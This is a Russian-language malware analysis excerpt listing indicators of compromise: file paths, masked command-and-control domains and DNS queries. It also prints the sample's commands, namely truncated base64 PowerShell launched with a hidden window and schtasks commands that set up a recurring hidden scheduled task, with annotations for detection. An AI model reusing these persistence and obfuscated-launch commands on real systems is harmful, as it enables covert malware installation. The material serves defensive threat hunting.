Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- %TEMP%\xafx916.1.tmp
- C:\users\public\libraries\thumbcache_33.db
- 'ww#.##gventures.com':80
- 'ot####kwotm5.top':80
- http://ot####kwotm5.top/
- DNS ASK ww#.##gventures.com
- DNS ASK zg####kwotm5.top
- DNS ASK ot####kwotm5.top
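- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
  (Примечание: видимая часть Base64-строки декодируется как `if(((Get-UICulture).Name -match "CN|RO|RU|UA|BY") -or ((Get-WmiObject -class ` — то есть сценарий начинается с проверки языка интерфейса системы. Остальная часть строки в отчёте обрезана, поэтому по ней нельзя определить, что выполняется при совпадении и какое второе условие проверяется.)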
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
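- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 20 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"
  (Примечание: параметры /sc DAILY /st 00:00 /RI 20 /du 23:59 задают ежедневный запуск с повтором каждые 20 минут в течение суток. Задача запускает через wscript.exe сценарий из C:\Users\Public\Libraries. При проверке узла стоит искать задачу планировщика с этим именем, указанный файл .js и ярлык автозагрузки, приведённый выше.)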